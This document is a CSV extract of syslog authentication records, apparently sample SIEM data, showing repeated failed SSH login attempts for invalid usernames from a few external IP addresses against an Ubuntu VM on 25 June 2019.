+8529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:16,UbuntuDevEnv,2019-06-25 21:33:15,auth,UbuntuDevEnv,info,Invalid user camera from 165.22.96.224 port 32850,10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,camera,165.22.96.2,32850,,
+8530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:16,UbuntuDevEnv,2019-06-25 21:33:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:16,UbuntuDevEnv,2019-06-25 21:33:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:17,UbuntuDevEnv,2019-06-25 21:33:17,auth,UbuntuDevEnv,info,Failed password for invalid user camera from 165.22.96.224 port 32850 ssh2,10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,camera,165.22.96.2,32850,,
+8533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:17,UbuntuDevEnv,2019-06-25 21:33:17,auth,UbuntuDevEnv,info,Disconnected from invalid user camera 165.22.96.224 port 32850 [preauth],10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,camera,165.22.96.2,32850,,
+8534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:17,UbuntuDevEnv,2019-06-25 21:33:17,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 32850:11: Bye Bye [preauth],10763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,32850,,
+8535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:40,UbuntuDevEnv,2019-06-25 21:33:40,auth,UbuntuDevEnv,info,Invalid user jana from 134.209.233.74 port 46014,10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jana,134.209.233.7,46014,,
+8536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:40,UbuntuDevEnv,2019-06-25 21:33:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:40,UbuntuDevEnv,2019-06-25 21:33:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:42,UbuntuDevEnv,2019-06-25 21:33:42,auth,UbuntuDevEnv,info,Failed password for invalid user jana from 134.209.233.74 port 46014 ssh2,10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jana,134.209.233.7,46014,,
+8539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:42,UbuntuDevEnv,2019-06-25 21:33:42,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 46014:11: Bye Bye [preauth],10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,46014,,
+8540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:33:42,UbuntuDevEnv,2019-06-25 21:33:42,auth,UbuntuDevEnv,info,Disconnected from invalid user jana 134.209.233.74 port 46014 [preauth],10853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jana,134.209.233.7,46014,,
+8541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:34:58,UbuntuDevEnv,2019-06-25 21:34:58,auth,UbuntuDevEnv,info,Invalid user sinusbot from 165.22.96.224 port 51472,11116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,165.22.96.2,51472,,
+8542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:34:58,UbuntuDevEnv,2019-06-25 21:34:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,11116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:34:58,UbuntuDevEnv,2019-06-25 21:34:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:00,UbuntuDevEnv,2019-06-25 21:35:00,auth,UbuntuDevEnv,info,Failed password for invalid user sinusbot from 165.22.96.224 port 51472 ssh2,11116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,165.22.96.2,51472,,
+8545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:00,UbuntuDevEnv,2019-06-25 21:35:00,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 51472:11: Bye Bye [preauth],11116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,51472,,
+8546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:00,UbuntuDevEnv,2019-06-25 21:35:00,auth,UbuntuDevEnv,info,Disconnected from invalid user sinusbot 165.22.96.224 port 51472 [preauth],11116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,165.22.96.2,51472,,
+8547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:03,UbuntuDevEnv,2019-06-25 21:35:03,auth,UbuntuDevEnv,info,Invalid user user2 from 134.209.233.74 port 34844,11139,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,134.209.233.7,34844,,
+8548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:03,UbuntuDevEnv,2019-06-25 21:35:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11139,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:03,UbuntuDevEnv,2019-06-25 21:35:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,11139,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:05,UbuntuDevEnv,2019-06-25 21:35:05,auth,UbuntuDevEnv,info,Failed password for invalid user user2 from 134.209.233.74 port 34844 ssh2,11139,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,134.209.233.7,34844,,
+8551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:05,UbuntuDevEnv,2019-06-25 21:35:05,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 34844:11: Bye Bye [preauth],11139,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,34844,,
+8552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:05,UbuntuDevEnv,2019-06-25 21:35:05,auth,UbuntuDevEnv,info,Disconnected from invalid user user2 134.209.233.74 port 34844 [preauth],11139,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,134.209.233.7,34844,,
+8553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:50,UbuntuDevEnv,2019-06-25 21:35:49,auth,UbuntuDevEnv,info,Invalid user vy from 212.156.136.114 port 22037,11307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vy,212.156.136.1,22037,,
+8554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:50,UbuntuDevEnv,2019-06-25 21:35:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:50,UbuntuDevEnv,2019-06-25 21:35:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,11307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:52,UbuntuDevEnv,2019-06-25 21:35:51,auth,UbuntuDevEnv,info,Failed password for invalid user vy from 212.156.136.114 port 22037 ssh2,11307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vy,212.156.136.1,22037,,
+8557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:52,UbuntuDevEnv,2019-06-25 21:35:51,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 22037:11: Bye Bye [preauth],11307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,22037,,
+8558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:35:52,UbuntuDevEnv,2019-06-25 21:35:51,auth,UbuntuDevEnv,info,Disconnected from invalid user vy 212.156.136.114 port 22037 [preauth],11307,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vy,212.156.136.1,22037,,
+8559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:33,UbuntuDevEnv,2019-06-25 21:36:33,auth,UbuntuDevEnv,info,Invalid user radio from 134.209.233.74 port 51902,11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,134.209.233.7,51902,,
+8560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:33,UbuntuDevEnv,2019-06-25 21:36:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:33,UbuntuDevEnv,2019-06-25 21:36:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:35,UbuntuDevEnv,2019-06-25 21:36:35,auth,UbuntuDevEnv,info,Failed password for invalid user radio from 134.209.233.74 port 51902 ssh2,11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,134.209.233.7,51902,,
+8563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:35,UbuntuDevEnv,2019-06-25 21:36:35,auth,UbuntuDevEnv,info,Disconnected from invalid user radio 134.209.233.74 port 51902 [preauth],11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,134.209.233.7,51902,,
+8564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:35,UbuntuDevEnv,2019-06-25 21:36:35,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 51902:11: Bye Bye [preauth],11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,51902,,
+8565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:40,UbuntuDevEnv,2019-06-25 21:36:40,auth,UbuntuDevEnv,info,Invalid user default from 165.22.96.224 port 41292,11501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,165.22.96.2,41292,,
+8566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:40,UbuntuDevEnv,2019-06-25 21:36:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,11501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:40,UbuntuDevEnv,2019-06-25 21:36:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:43,UbuntuDevEnv,2019-06-25 21:36:42,auth,UbuntuDevEnv,info,Failed password for invalid user default from 165.22.96.224 port 41292 ssh2,11501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,165.22.96.2,41292,,
+8569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:43,UbuntuDevEnv,2019-06-25 21:36:42,auth,UbuntuDevEnv,info,Disconnected from invalid user default 165.22.96.224 port 41292 [preauth],11501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,165.22.96.2,41292,,
+8570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:36:43,UbuntuDevEnv,2019-06-25 21:36:42,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 41292:11: Bye Bye [preauth],11501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,41292,,
+8571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:37:59,UbuntuDevEnv,2019-06-25 21:37:59,auth,UbuntuDevEnv,info,Invalid user ftp1 from 134.209.233.74 port 40728,11776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,134.209.233.7,40728,,
+8572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:37:59,UbuntuDevEnv,2019-06-25 21:37:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:37:59,UbuntuDevEnv,2019-06-25 21:37:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,11776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:01,UbuntuDevEnv,2019-06-25 21:38:01,auth,UbuntuDevEnv,info,Failed password for invalid user ftp1 from 134.209.233.74 port 40728 ssh2,11776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,134.209.233.7,40728,,
+8575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:01,UbuntuDevEnv,2019-06-25 21:38:01,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 40728:11: Bye Bye [preauth],11776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,40728,,
+8576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:01,UbuntuDevEnv,2019-06-25 21:38:01,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp1 134.209.233.74 port 40728 [preauth],11776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,134.209.233.7,40728,,
+8577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:18,UbuntuDevEnv,2019-06-25 21:38:18,auth,UbuntuDevEnv,info,Invalid user jana from 165.22.96.224 port 59690,11846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jana,165.22.96.2,59690,,
+8578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:18,UbuntuDevEnv,2019-06-25 21:38:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:18,UbuntuDevEnv,2019-06-25 21:38:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,11846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:20,UbuntuDevEnv,2019-06-25 21:38:19,auth,UbuntuDevEnv,info,Failed password for invalid user jana from 165.22.96.224 port 59690 ssh2,11846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jana,165.22.96.2,59690,,
+8581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:20,UbuntuDevEnv,2019-06-25 21:38:20,auth,UbuntuDevEnv,info,Disconnected from invalid user jana 165.22.96.224 port 59690 [preauth],11846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jana,165.22.96.2,59690,,
+8582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:38:20,UbuntuDevEnv,2019-06-25 21:38:20,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 59690:11: Bye Bye [preauth],11846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,59690,,
+8583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:20,UbuntuDevEnv,2019-06-25 21:39:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74  user=test,12066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,134.209.233.7,,0,
+8584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:22,UbuntuDevEnv,2019-06-25 21:39:22,auth,UbuntuDevEnv,info,Failed password for test from 134.209.233.74 port 57792 ssh2,12066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,57792,,
+8585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:22,UbuntuDevEnv,2019-06-25 21:39:22,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 57792:11: Bye Bye [preauth],12066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,57792,,
+8586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:22,UbuntuDevEnv,2019-06-25 21:39:22,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 134.209.233.74 port 57792 [preauth],12066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,134.209.233.7,57792,,
+8587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:54,UbuntuDevEnv,2019-06-25 21:39:53,auth,UbuntuDevEnv,info,Invalid user dev from 165.22.96.224 port 49316,12182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,165.22.96.2,49316,,
+8588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:54,UbuntuDevEnv,2019-06-25 21:39:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,12182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
